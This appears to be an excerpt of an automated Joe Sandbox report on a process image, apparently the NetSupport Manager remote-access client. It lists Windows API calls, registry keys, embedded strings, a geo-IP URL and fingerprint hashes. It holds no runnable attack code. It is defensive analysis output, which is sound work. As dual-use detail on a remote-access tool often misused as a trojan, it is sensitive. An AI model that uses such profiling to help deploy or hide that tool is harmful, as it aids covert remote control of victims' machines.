                                                                                    • Part of subcall function 110F0CF0: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11106267,?), ref: 110F0D1B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
                                                                                  • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                                  • API String ID: 1574099134-3013461081
                                                                                  • Opcode ID: e4cf314df931be329bed10d82e2fbe7145bba63e1bcfccc88a3091ef951cf9c4
                                                                                  • Instruction ID: 01093d0ef8ba3b8d66a1f5e3f4838d53f0bc1b4d1e9212342b6ef41ebc516d7c
                                                                                  • Opcode Fuzzy Hash: e4cf314df931be329bed10d82e2fbe7145bba63e1bcfccc88a3091ef951cf9c4
                                                                                  • Instruction Fuzzy Hash: 64410E79F0411AABD700DFA59C81E9EFBB9EB8462CF524535F909E7240EA306904CBE1
                                                                                  APIs
                                                                                    • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C455
                                                                                  • GetTickCount.KERNEL32 ref: 1102C47A
                                                                                    • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                  • GetTickCount.KERNEL32 ref: 1102C574
                                                                                    • Part of subcall function 110D1370: wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                    • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C66C
                                                                                  • CloseHandle.KERNEL32(?), ref: 1102C688
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                  • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                  • API String ID: 596640303-1725438197
                                                                                  • Opcode ID: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                  • Instruction ID: 59613557395ae23f7967247d4baf4cae7550bfc3229e85cd4bc92fe2e2f2b4a8
                                                                                  • Opcode Fuzzy Hash: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                  • Instruction Fuzzy Hash: 6B818275E0020AABDF04DBE8CD94FEEF7B5AF59708F504258E82567284DB34BA05CB61
                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106175A
                                                                                    • Part of subcall function 11061140: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                    • Part of subcall function 11061140: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110617AB
                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11061865
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 11061881
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Enum$Open$CloseValue
                                                                                  • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                  • API String ID: 2823542970-1528906934
                                                                                  • Opcode ID: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                  • Instruction ID: 3a074a016260bf88f68c0586b8c591cabbb012c9b5ad66670ab8b6bf40d046b4
                                                                                  • Opcode Fuzzy Hash: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                  • Instruction Fuzzy Hash: 5F416179E4022DABD724CB55CC81FEAB7BCEB94748F1001D9EA48A6140D6B06E84CFA1
                                                                                  APIs
                                                                                    • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                  • GetTickCount.KERNEL32 ref: 11137692
                                                                                    • Part of subcall function 11096970: CoInitialize.OLE32(00000000), ref: 11096984
                                                                                    • Part of subcall function 11096970: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                    • Part of subcall function 11096970: CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                    • Part of subcall function 11096970: CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                  • GetTickCount.KERNEL32 ref: 111376A1
                                                                                  • _memset.LIBCMT ref: 111376E3
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 111376F9
                                                                                  • _strrchr.LIBCMT ref: 11137708
                                                                                  • _free.LIBCMT ref: 1113775A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                  • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                  • API String ID: 711243594-1270230032
                                                                                  • Opcode ID: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                  • Instruction ID: 94b21c48fabd249aebac1ca0d473d12a11480cc4bb4ab1ee9f0f9b3b40903c19
                                                                                  • Opcode Fuzzy Hash: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                  • Instruction Fuzzy Hash: 9941AE7AE0022E97C710DF756C89BEFF7699B5471DF040079E90493140EAB1AD44CBE1
                                                                                  APIs
                                                                                    • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                    • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                    • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                    • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                    • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                    • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                  • AdjustWindowRectEx.USER32(111417B8,00CE0000,00000001,00000001), ref: 11133EC7
                                                                                  • LoadMenuA.USER32(00000000,000003EC), ref: 11133ED8
                                                                                  • GetSystemMetrics.USER32(00000021), ref: 11133EE9
                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 11133EF1
                                                                                  • GetSystemMetrics.USER32(00000004), ref: 11133EF7
                                                                                  • GetDC.USER32(00000000), ref: 11133F03
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11133F0E
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 11133F1A
                                                                                  • CreateWindowExA.USER32(00000001,NSMWClass,02B6DD98,00CE0000,80000000,80000000,111417B8,?,00000000,?,11000000,00000000), ref: 11133F6F
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,110F7D09,00000001,111417B8,_debug), ref: 11133F77
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                  • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                  • API String ID: 1594747848-1114959992
                                                                                  • Opcode ID: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                  • Instruction ID: 5297cf036ba1cbd73fc44df567c8a611b910eb11675e7325f2afb4d5e36916b9
                                                                                  • Opcode Fuzzy Hash: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                  • Instruction Fuzzy Hash: C4316275E10219ABDB149FF58C85FAFFBB8EB48709F100529FA25B7284D67469008BA4
                                                                                  APIs
                                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102DD98,00000000,AD96CFBE,?,00000000,00000000), ref: 1102CE44
                                                                                  • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CE5A
                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CE6E
                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE75
                                                                                  • Sleep.KERNEL32(00000032), ref: 1102CE86
                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE96
                                                                                  • Sleep.KERNEL32(000003E8), ref: 1102CEE2
                                                                                  • CloseHandle.KERNEL32(?), ref: 1102CF0F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                  • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                  • API String ID: 83693535-2077998243
                                                                                  • Opcode ID: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                  • Instruction ID: 880dc79335238c7f7dd8ff78cda89552a6d5dde84d0873ba54ec41c4173cff75
                                                                                  • Opcode Fuzzy Hash: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                  • Instruction Fuzzy Hash: 27B19475E012259FDB25DFA4CD80BEDB7B5BB48708F5041E9E919AB381DB70AA80CF50
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 11132C60
                                                                                  • GetTickCount.KERNEL32 ref: 11132C91
                                                                                  • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                  • GetTickCount.KERNEL32 ref: 11132CAC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$FolderPathwsprintf
                                                                                  • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                  • API String ID: 1170620360-4157686185
                                                                                  • Opcode ID: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                  • Instruction ID: 1138b9c1199a8041912b1953dd267279d987a2a799c8ea79b9a25deb6d60bab0
                                                                                  • Opcode Fuzzy Hash: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                  • Instruction Fuzzy Hash: F33157BAE4022E67E700AFB0AC84FEDF36C9B9471EF1000A9E915A7145EA72B545C761
                                                                                  APIs
                                                                                  • GetVersionExA.KERNEL32(111F0EF0,75A78400), ref: 111450D0
                                                                                  • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                  • _memset.LIBCMT ref: 1114512D
                                                                                    • Part of subcall function 11143000: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75A78400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                  • _strncpy.LIBCMT ref: 111451FA
                                                                                    • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                  • RegCloseKey.KERNEL32(00000000), ref: 11145296
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                  • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                  • API String ID: 3299820421-2117887902
                                                                                  • Opcode ID: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                  • Instruction ID: 1fcbe558ef897eaa1b38a7330f4b62b9d1ba330f7a3c6d488077e096d0eda0f8
                                                                                  • Opcode Fuzzy Hash: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                  • Instruction Fuzzy Hash: 6D51D9B1E0022BEFEB51CF60CD41F9EF7B9AB04B08F104199F519A7941E7716A48CB91
                                                                                  APIs
                                                                                  • _strtok.LIBCMT ref: 11026C26
                                                                                  • _strtok.LIBCMT ref: 11026C60
                                                                                  • Sleep.KERNEL32(1102FC53,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11026D54
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _strtok$Sleep
                                                                                  • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                  • API String ID: 2009458258-3774545468
                                                                                  • Opcode ID: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                  • Instruction ID: 546c7fd96e7e5c201e62e0728b24f9c1e86d1f0ab762c79c207aecf2c2ec1ca9
                                                                                  • Opcode Fuzzy Hash: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                  • Instruction Fuzzy Hash: A951F375E0525E9BDF11EFA9CC80BBEFBB5EB84308FA44069DC1167284E631A846C742
                                                                                  APIs
                                                                                    • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 11102C6C
                                                                                  • GetThreadDesktop.USER32(00000000), ref: 11102C73
                                                                                  • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11102C83
                                                                                  • SetThreadDesktop.USER32(00000000), ref: 11102C90
                                                                                  • CloseDesktop.USER32(00000000), ref: 11102CA9
                                                                                  • GetLastError.KERNEL32 ref: 11102CB1
                                                                                  • CloseDesktop.USER32(00000000), ref: 11102CC7
                                                                                  • GetLastError.KERNEL32 ref: 11102CCF
                                                                                  Strings
                                                                                  • SetThreadDesktop(%s) ok, xrefs: 11102C9B
                                                                                  • SetThreadDesktop(%s) failed, e=%d, xrefs: 11102CB9
                                                                                  • OpenDesktop(%s) failed, e=%d, xrefs: 11102CD7
